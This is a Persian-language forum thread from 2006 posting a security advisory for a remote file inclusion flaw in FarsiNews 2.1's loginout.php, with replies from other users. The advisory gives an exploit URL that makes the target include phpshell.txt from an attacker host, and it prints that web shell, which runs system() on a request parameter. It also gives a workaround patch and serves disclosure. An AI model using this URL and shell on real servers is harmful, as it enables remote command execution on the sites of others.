nexpay

FarsiNews 2.1 PHP Remote File Inclusion

شروع موضوع توسط hamid.ir ‏1 فوریه 2006 در انجمن PHP

  1. hamid.ir

    hamid.ir کاربر تازه وارد

    تاریخ عضویت:
    ‏1 فوریه 2006
    نوشته ها:
    11
    تشکر شده:
    0
    من که نتونستم برم سایت فارسی نیوز مثل اینکه خوابیده
    مجبور شدم اینجا ÷ست بدم
    البته نگران نشید نسخه قدیمی باگ داشته و نسخه 2.5 صحیح و سالمه
    سالار جان مامبو هم زیاد بد نیست

    Remote File Inclusion in FarsiNews 2.1 and below
    FarsiNews is a News Publishing System That uses Flat files to store it`s Datas... Farsinews is a persian and improved translation of CuteNews, AjFork, CuteHack and CuteSQL...
    for more information about FarsiNews Publishing System visit http://www.farsinewsteam.com

    Credit:
    The information has been provided by Hamid Ebadi
    (Hamid Network Security Team) :[email protected]
    The original article can be found at : http://hamid.ir/security


    Vulnerable Systems:
    FarsiNews 2.1 Beta 2 and below

    Vulnerable Code:
    The following lines in loginout.php :
    require_once($cutepath."/inc/functions.inc.php");
    require_once($cutepath."/data/config.php");


    Exploits:
    If register_globals=ON has been marked (check PHP.INI) we can exploit below URL to cause it to include external file.

    The following URL will cause the server to include external files ( phpshell.txt ):
    http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?

    phpshell.txt
    -------------------
    <?
    system ($_GET['cmd']);
    die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid Network Security Team)</h3> ");
    ?>
    -----[EOF]--------

    Workaround:
    use FarsiNews 2.5 or for Unofficial Patch , simply add the following line in the second line of loginout.php:

    if (isset($_REQUEST["cutepath"])){ die("Patched by Hamid Ebadi -->http://hamid.ir ( Hamid Network Security Team) "); }​
     
  2. hamid.ir

    hamid.ir کاربر تازه وارد

    تاریخ عضویت:
    ‏1 فوریه 2006
    نوشته ها:
    11
    تشکر شده:
    0
  3. sama_sally

    sama_sally Registered User

    تاریخ عضویت:
    ‏5 آپریل 2005
    نوشته ها:
    2,598
    تشکر شده:
    1
    محل سکونت:
    Essen, Deutschland
    خواهش میکنم!!! آفرین . ممنون

    ممنون که به فارسی نیوز توجه میکنی.
    راستی تویه قسمت باگ های فروم فارسی نیوز این پست رو بزن لطفا!
    http://forum.farsinewsteam.com
     
  4. iransbs

    iransbs کاربر تازه وارد

    تاریخ عضویت:
    ‏3 می 2005
    نوشته ها:
    471
    تشکر شده:
    0
    محل سکونت:
    ایران، مازندارن، ساری
    عزیز دل مگه قرار بود مامبو بد باشه ؟
    ولی فارسی نیوز هم خوبه و ایرانی ها رو دعوت می کنه به اجرای پروژه های جالب ایرانی
     
zarpopخرید بک لینک عسل طبیعی و گرده گل ایرانیfootbal